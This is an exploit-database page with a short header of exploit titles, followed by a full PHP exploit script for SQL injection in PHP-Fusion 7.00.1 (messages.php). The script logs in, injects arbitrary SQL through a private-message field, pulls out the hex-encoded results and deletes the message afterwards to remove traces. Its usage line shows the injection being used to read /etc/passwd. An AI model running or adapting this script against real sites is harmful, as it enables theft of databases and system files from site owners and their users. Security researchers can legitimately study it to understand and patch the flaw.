477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
147 lines
4.2 KiB
PHP
Executable file
147 lines
4.2 KiB
PHP
Executable file
<?php
|
|
/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
|
|
PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit
|
|
requires magic_quotes == off
|
|
|
|
coded by irk4z[at]yahoo.pl
|
|
homepage: http://irk4z.wordpress.com
|
|
|
|
greets: all friends ;)
|
|
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*/
|
|
|
|
$host = $argv[1];
|
|
$path = $argv[2];
|
|
$login = $argv[3];
|
|
$pass = $argv[4];
|
|
$sql_injection = $argv[5];
|
|
|
|
echo
|
|
"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n".
|
|
" PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\n".
|
|
" requires magic_quotes == off\n".
|
|
"\n".
|
|
" coded by irk4z[at]yahoo.pl\n".
|
|
" homepage: http://irk4z.wordpress.com\n".
|
|
"\n".
|
|
" greets: all friends ;)\n".
|
|
"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n";
|
|
|
|
if(empty($host) || empty($path) || empty($login) || empty($pass) || empty($sql_injection) ){
|
|
echo "Usage: php $argv[0] <host> <path> <login> <pass> <SQL>\n" .
|
|
" php $argv[0] localhost /php-fusion/ user s3cret \"SELECT database()\"\n".
|
|
" php $argv[0] localhost / user s3cret \"SELECT load_file(0x2F6574632F706173737764)\"\n\n";
|
|
die;
|
|
}
|
|
|
|
echo "Logging into system...";
|
|
//login to php-fusion using login and pass
|
|
$login_data = send($host, array( "path" => $path."news.php",
|
|
"post" => array(
|
|
"user_name" => $login,
|
|
"user_pass" => $pass,
|
|
"login" => "Login"
|
|
)
|
|
)
|
|
);
|
|
|
|
//get cookies
|
|
preg_match_all("/Set-Cookie:[\s]+([a-z_A-Z0-9]+=[a-z_A-Z0-9\.]+;)/", $login_data, $matches);
|
|
$cookies = implode(' ', $matches[1]);
|
|
|
|
//get user id
|
|
preg_match_all("/([0-9])+.([a-zA-Z0-9]{32})/", $cookies, $matches);
|
|
$my_id = $matches[1][0];
|
|
|
|
if(empty($my_id)){
|
|
echo "\n[x] Incorrect login or password..";
|
|
die;
|
|
} else {
|
|
echo "[ok]\n";
|
|
}
|
|
|
|
$id_message = uniqid();
|
|
$inhex = '';
|
|
for($i = 0; $i < strlen($id_message); $i++) $inhex .= dechex( ord($id_message[$i]) ) ;
|
|
|
|
echo "Running sql-injection...\n";
|
|
//running sql-injection
|
|
$res = send($host, array( "path" => $path."messages.php?msg_send={$my_id}%27%2F%2Axxx&",
|
|
"cookie" => $cookies,
|
|
"post" => array(
|
|
"send_message" => 'X',
|
|
"subject" => "X*/,0x{$inhex}, (SELECT/**/concat(0x{$inhex}{$inhex},hex(($sql_injection)),0x{$inhex}{$inhex})),0x79,1,1226787120,1)/*",
|
|
"message" => "XXX"
|
|
)
|
|
)
|
|
);
|
|
|
|
echo "Getting data...\n\n";
|
|
$res = send($host, array( "path" => $path."messages.php?folder=outbox",
|
|
"cookie" => $cookies )
|
|
);
|
|
|
|
preg_match_all("/msg_read=([0-9]+)'>{$id_message}<\/a>/", $res, $matches);
|
|
$id_message_number = $matches[1][0];
|
|
|
|
$res = send($host, array( "path" => $path."messages.php?folder=outbox&msg_read=".$id_message_number,
|
|
"cookie" => $cookies )
|
|
);
|
|
|
|
preg_match_all("/{$id_message}{$id_message}(.*){$id_message}{$id_message}/", $res, $matches);
|
|
|
|
if( empty($matches[1][0]) ){
|
|
echo "[x] Failed... maybe SQL-INJ is incorrect?\n\n";
|
|
} else {
|
|
$tmp = '';
|
|
$hex = $matches[1][0];
|
|
//unhex it!
|
|
for($i = 0; $i < strlen($hex); $i+=2) $tmp .= chr(hexdec($hex[$i] . $hex[$i+1]));
|
|
echo "DATA: \n".$tmp."\n\n";
|
|
}
|
|
|
|
echo "Deleting message...\n";
|
|
|
|
$res = send($host, array( "path" => $path."messages.php?folder=outbox&msg_id=".$id_message_number,
|
|
"cookie" => $cookies,
|
|
"post" => array (
|
|
"delete" => "Delete"
|
|
)
|
|
)
|
|
);
|
|
|
|
//send http packet
|
|
function send($host, $dane = "") {
|
|
$packet = (empty($dane['post']) ? "GET" : "POST") . " {$dane["path"]} HTTP/1.1\r\n";
|
|
$packet .= "Host: {$host}\r\n";
|
|
|
|
if( !empty($dane['cookie']) ){
|
|
$packet .= "Cookie: {$dane['cookie']}\r\n";
|
|
}
|
|
|
|
if( !empty($dane['post']) ){
|
|
$reszta_syfu = "";
|
|
foreach($dane['post'] as $tmp => $tmp2){
|
|
$reszta_syfu .= $tmp . "=" . $tmp2 . "&";
|
|
}
|
|
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
|
|
$packet .= "Connection: Close\r\n";
|
|
$packet .= "Content-Length: ".strlen($reszta_syfu)."\r\n\r\n";
|
|
$packet .= $reszta_syfu;
|
|
} else {
|
|
$packet .= "Connection: Close\r\n\r\n";
|
|
}
|
|
|
|
$o = @fsockopen($host, 80);
|
|
if(!$o){
|
|
echo "\n[x] No response...\n";
|
|
die;
|
|
}
|
|
fputs($o, $packet);
|
|
while (!feof($o)) $ret .= fread($o, 1024);
|
|
fclose($o);
|
|
return ($ret);
|
|
}
|
|
|
|
?>
|
|
|
|
# milw0rm.com [2008-11-20]
|